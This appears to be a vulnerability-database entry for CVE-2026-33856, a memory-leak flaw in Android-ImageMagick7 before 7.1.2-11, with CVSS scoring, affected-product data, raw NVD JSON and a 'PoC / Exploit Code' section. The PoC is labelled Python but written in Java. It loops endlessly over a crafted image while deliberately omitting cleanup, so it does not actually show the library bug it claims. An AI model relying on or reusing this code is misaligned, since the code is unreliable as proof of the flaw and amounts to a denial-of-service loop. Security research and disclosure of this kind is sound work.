Security Vulnerability Report
中文
CVE-2026-33856 CVSS 7.5 HIGH

CVE-2026-33856

Published: 2026-03-24 06:16:23
Last Modified: 2026-03-26 19:06:40

Description

Missing Release of Memory after Effective Lifetime vulnerability in MolotovCherry Android-ImageMagick7.This issue affects Android-ImageMagick7: before 7.1.2-11.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:molotovcherry:android-imagemagick7:*:*:*:*:*:*:*:* - VULNERABLE
MolotovCherry Android-ImageMagick7 < 7.1.2-11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* * PoC for Memory Leak in Android-ImageMagick7 (CVE-2026-33856) * This code demonstrates the concept of triggering a memory leak * by repeatedly processing images without proper resource cleanup. */ import magick.ImageInfo; import magick.MagickImage; import magick.MagickException; public class CVE202633856_PoC { public static void main(String[] args) { try { // Simulate processing a crafted image that triggers the leak while (true) { // Load a potentially malicious image ImageInfo info = new ImageInfo("crafted_image.png"); MagickImage image = new MagickImage(info); // Perform operations that cause memory allocation // In the vulnerable version (< 7.1.2-11), memory is not released here image.scaleImage(800, 600); image.blurImage(1.0, 1.0); // Intentionally avoiding explicit destroyImage() to simulate the bug path // In a real scenario, the library should handle cleanup automatically System.out.println("Image processed, memory leaking..."); } } catch (MagickException e) { e.printStackTrace(); } catch (OutOfMemoryError e) { System.out.println("System ran out of memory due to leak."); } } }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33856", "sourceIdentifier": "[email protected]", "published": "2026-03-24T06:16:22.970", "lastModified": "2026-03-26T19:06:39.660", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Release of Memory after Effective Lifetime vulnerability in MolotovCherry Android-ImageMagick7.This issue affects Android-ImageMagick7: before 7.1.2-11."}, {"lang": "es", "value": "Vulnerabilidad por falta de liberación de memoria después de la vida útil efectiva en MolotovCherry Android-ImageMagick7. Este problema afecta a Android-ImageMagick7: antes de 7.1.2-11."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:molotovcherry:android-imagemagick7:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.1.2-11", "matchCriteriaId": "CD4FC35B-5E60-42CC-87A5-71FF393A6EAB"}]}]}], "references": [{"url": "https://github.com/MolotovCherry/Android-ImageMagick7/pull/191", "source": "[email protected]", "tags": ["Issue Tracking"]}]}}